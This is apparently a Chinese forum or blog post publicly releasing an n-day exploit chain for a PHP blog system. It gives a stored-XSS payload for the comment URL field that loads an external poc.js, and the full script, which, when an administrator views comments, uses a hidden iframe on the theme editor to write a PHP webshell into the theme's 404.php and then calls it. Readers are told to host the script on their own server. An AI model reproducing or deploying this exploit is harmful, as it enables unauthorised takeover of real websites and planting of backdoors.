nday

这个洞去年的时候我就已经在手上有了

但是一直都没放出来 前段时间看到有人放了

但是还要设置成收费模式 我这里就直接公开了

在评论区评论网址框里面填写这段

http://www.shenwang.vip/"><script/src=http://shenwang.vip/poc.js></script><div/"

记得把poc的js地址改成你自己的线上服务器

poc.js

function step1(){
    var data2="<iframe id=\"testxss\" src=\"/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>";
    var oldata=document.body.innerHTML;
    document.body.innerHTML=(oldata+data2);}
    
var times=0;
var g_shell=0;
function poc(){
    phpcode="";
    if(times<=10){
        var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
        var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
        olddatas=htmldata.innerText;
        htmldata.innerText=('<?php if(isset($_GET[\'shell\'])){if($_GET[\'shell\']==="1"){'+phpcode+'}}?>\n')+olddatas;
        btn[1].click();
        times+=1;
        if(g_shell==1){
            var xhr1=new XMLHttpRequest();
            xhr1.open('get','/usr/themes/default/404.php?shell=1');
            xhr1.send();
            }
        else{
            return 0;
        }
    }
}
step1();

触发条件就是管理员登录后台看评论的时候就会触发这段js

然后js写入一个一句话在网站里面

路径如下

host+/usr/themes/default/404.php